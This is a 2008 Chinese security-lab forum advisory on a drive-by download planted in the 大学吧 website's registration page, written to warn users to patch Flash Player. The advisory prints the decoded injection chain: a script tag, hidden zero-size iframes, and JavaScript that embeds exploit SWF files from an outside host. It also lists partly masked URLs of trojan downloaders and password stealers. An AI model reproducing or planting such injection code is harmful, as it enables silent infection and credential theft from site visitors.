设为首页

 找回密码
 注册创意安天
创意安天»论坛 社区服务 傲气安天 病毒播报 大学吧网站挂马事件
返回列表 发新帖

大学吧网站挂马事件

[复制链接]
发表于 2008-5-29 16:16 | 显示全部楼层 |阅读模式
5月29日,安天实验室发现,近期利用Flash插件挂马事件较多,提请广大用户注意。以下以大学吧网站为例。

        大学吧网站挂注册页面(http://www.haydao.com/member/register.php)被黑客植入病毒,用户如果访问该网站,
系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息,甚
至导致死机。

     该网站问题代码:

1.jpg

    <script type="text/javascript" src="/include/js/common.js"></script>
     http://www.ha****.com/include/js/common.js问题框架代码:

2.jpg      


    代码解密后得出的地址:document.writeln("<script src=http://www.tv008.com/include/haed.js></script>");
    http://www.t****.com/include/haed.js问题框架代码:


3.jpg


      <iframe src=http://www.fire122.cn/zi.htm?006 width=100 height=0></iframe>
      http://www.fir****.cn/zi.htm?006问题框架代码:

4.jpg


         <iframe width=100 height=100 src=ad/ad.htm></iframe>
         http://www.fir****.cn/ad/ad.htm 网马代码:


5.jpg   


           该加密网马解密后可知利用了一个最新的Adobe Flash Player SWF文件漏洞。
           ad.htm解密后网马代码:                     
                       
window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
document.write('<param name="allowScriptAccess" value="always"/>');
document.write('<param name="movie" value="http://www.psp1111.cn/flash/versionie.swf"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src="http://www.psp1111.cn/flash/versionie.swf"/>');
document.write('</object>');
}else
{document.write("<EMBED src=http://www.psp1111.cn/flash/versionff.swf width=0 height=0>");}}


         该漏洞针对Adobe Flash Player ActiveX版本号为9.0.124.0以前的所有版本有效。


6.jpg


例如:版本:9.0.115.0也会中这种网马。
建议用户尽快更新自己的Adobe Flash Player ActiveX或者到Adobe官方网站下载升级补丁:http://www.adobe.com/go/getflash

http://www.fir****.cn/ad/vip1.htm 网马代码:

7.jpg

    该加密网马解密后可知利用以下漏洞来传播:
  MS06014漏洞 (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)
  RealPlayer播放器IERPCtl.IERPCtl.1漏洞
  联众世界游戏大厅所安装的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞
  当用户访问http://www.haydao.com/member/register.php时,系统会自动

  下载以下病毒文件:
  http://www.pp****.cn/e.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ajyu)
  http://60.190.114.**/a1.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.akay)
  http://60.190.114.**/a2.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ajss)
  http://60.190.114.**/a3.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ajsw)
  http://60.190.114.**/a4.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ajtt)
  http://60.190.114.**/a5.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ajto)
  http://60.190.114.**/a6.exe
  病毒名:(Trojan-PSW.Win32.QQPass.cbj)
  http://60.190.114.**/a7.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ajtx)
  http://60.190.114.**/a8.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ajnn)
  http://60.190.114.**/a9.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aknn)
  http://60.190.114.**/a10.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ajtr)
  http://60.190.114.**/a11.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ajti)
  http://60.190.114.**/a12.exe
  病毒名:(Trojan-Dropper.Win32.Agent.sbh)
  http://60.190.114.**/a13.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ajsz)
  http://60.190.114.**/a14.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ajtn)
  http://60.190.114.**/a15.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.akka)
  http://60.190.114.**/a16.exe
  病毒名:(Trojan-PSW.Win32.Lmir.bvh)
  http://60.190.114.**/a17.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.akau)
  http://60.190.114.**/a18.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ajsr)
  http://60.190.114.**/a19.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ajth)
  http://60.190.114.**/a20.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ajtq)
  http://60.190.114.**/a21.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aeoa)
  http://60.190.114.**/a22.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aklk)
  http://60.190.114.**/a23.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ajyj)
  http://60.190.114.**/a24.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ajsp)
  http://60.190.114.**/a25.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ajta)
  http://60.190.114.**/a26.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.akjn)
  http://60.190.114.**/a27.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ajyu)
  http://60.190.114.**/a28.exe
  病毒名:(Trojan.Win32.StartPage.avr)
  http://60.190.114.**/a29.exe
  病毒名:(Trojan.Win32.Agent.lww)
  以上病毒文件为下载者木马和游戏盗号木马,自动运行后将会,盗取用户敏感
信息,甚至导致死机。由于下载数量太多,这里不一一分析。


大学

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册创意安天

本版积分规则

Archiver|手机版|小黑屋|创意安天 ( 京ICP备09068574,ICP证100468号。 )

GMT+8, 2024-9-17 03:40

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表